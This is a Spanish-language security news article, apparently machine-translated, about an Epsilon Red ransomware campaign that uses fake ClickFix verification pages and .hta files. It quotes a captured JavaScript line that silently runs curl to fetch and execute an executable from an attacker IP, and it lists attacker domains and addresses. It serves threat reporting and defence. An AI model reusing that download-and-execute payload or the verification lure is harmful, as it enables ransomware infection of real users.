Una nueva ola de ataques de ransomware ha surgido en julio de 2025, aprovechando los archivos HTML (.hta) armados para implementar silenciosamente la cepa roja de ransomware Epsilon.
La campaña, que se ha extendido a nivel mundial, se ha disfrazada de páginas de verificación inocuas marcadas como “clickfix”, atrayendo a los usuarios que frecuentan plataformas populares como Discord, Twitch, Kick y OnlyFans.
Al explotar la confianza de los usuarios en estos servicios, los operadores convencen a las víctimas para ejecutar scripts entregados en el navegador que evitan las advertencias de descarga convencionales.
El ataque comienza con un portal de verificación falsificado que solicita a un usuario que “pruebe” la autenticidad antes de acceder al contenido.
Una vez que se presiona el botón, el sitio se redirige a una página secundaria configurada para ejecutar controles activos integrados, una tecnología Windows anticuada pero aún habilitada, que permite la ejecución de comandos arbitrarios dentro del motor de renderizado de Internet Explorer.
Investigadores de Cloudsek anotado que esta técnica de redirección se aparta de los señuelos Red Epsilon Red basados en el portapapeles anteriores, lo que le da a la iteración actual una tasa de éxito de infección notablemente más alta.
Después de activar el objeto ActiveX, el código malicioso invoca el host de script de Windows (WSH) para generar un shell de comando oculto.
A partir de ahí, un pequeño comando similar a PowerShell saca un binario de la infraestructura del atacante, la ejecuta en la memoria y prácticamente no deja artefactos visibles durante el compromiso inicial.
Los analistas de CloudSek vincularon la infraestructura de alojamiento a dominios como TWTICH (.) CC y Capchabot (.) CC, y a las direcciones IP 155.94.155.227: 2269 y 213.209.150.188: 8112, confirmando una red cohesiva operada por el mismo actor de amenaza Cluster.
Las víctimas sufren el cifrado de datos rápidos típicos de Epsilon Red, con notas de rescate con un estilo flojo después del infame comunicado de Revil, pero con ajustes gramaticales menores.
Más allá del cifrado de archivos, la técnica expone una brecha de seguridad más profunda: cualquier entorno ActiveX habilitado para Legacy puede ser comandado para iniciar binarios nativos directamente desde una sesión de navegador, descargando la cuarentena, la pantalla inteligente y la mayoría de las defensas de punto final.
Las organizaciones que dependen de suites de productividad basadas en la web o permiten que los complementos de navegador no administrados enfrenten un riesgo elevado.
Mecanismo de infección: armado .hta a través de ActiveX
En el corazón de la campaña hay un archivo .hta, representado por mshta.exe, incrustando JavaScript que genera wscript.shell.
El fragmento a continuación, capturado desde el sitio en vivo, muestra cómo la carga útil alcanza la ejecución sin disco:-
var shell = new ActiveXObject (“wscript.shell”); shell.run (“cmd/c cd/d % userProfile % && curl -s -o a.exe http://155.94.155.227:2269/dw/vir.exe && a.exe”, 0);
Este comando de una sola línea navega silenciosamente al directorio de perfil de la víctima, recupera vir.exe, lo ejecuta y oculta la ventana (el “0” de fin de semana).
Página de verificación adicional (fuente – CloudSek)
Un comando de seguimiento planta un indicador de “código de verificación” falso para distraer al usuario:-
caparazón. Ejecutar (“CMD /C echo su código de verificatificación es: p3l9x y pausa”);
Al ejecutarse dentro del mismo proceso WSH, el ransomware gana privilegios completos de nivel de usuario, programas de persistencia a través de Schtasks y comienza el descubrimiento de red.
Deshabilitar ActiveX y WSH, hacer cumplir las políticas modernas del navegador y la lista negra continuamente en la lista negra los dominios identificados y las IP son las mitigaciones más inmediatas, mientras que el endurecimiento de la red más profundo y las simulaciones de phishing centradas en el usuario siguen siendo esenciales.
Verificación de clickFix (fuente – CloudSek)
Esta página de verificación ilustra la pantalla de verificación engañosa que inicia esta cadena.
Experimenta una detección de phishing más rápida y precisa y una protección mejorada para su negocio con análisis de sandbox en tiempo real-> Prueba cualquiera.
